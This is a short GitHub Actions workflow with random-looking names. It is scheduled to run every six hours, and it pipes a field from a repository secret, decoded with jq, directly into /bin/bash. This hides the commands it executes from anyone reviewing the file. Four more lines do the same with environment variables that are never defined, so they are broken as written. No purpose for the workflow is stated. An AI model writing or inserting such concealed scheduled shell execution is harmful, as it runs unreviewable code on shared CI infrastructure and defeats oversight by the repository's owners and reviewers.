name: lividmissile
on:
  workflow_dispatch:
  schedule:
    - cron: '29 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lividmissile
        env:
          kqy8170: ${{ secrets.kqy8170 }}
        run: |
          echo $kqy8170 | jq -r .bjd50819 | /bin/bash
          echo $ev113 | jq -r .lesp2697 | /bin/bash
          echo $ogo82730 | jq -r .e7 | /bin/bash
          echo $uy265 | jq -r .iyasb4159 | /bin/bash
          echo $fqad0 | jq -r .y1230 | /bin/bash

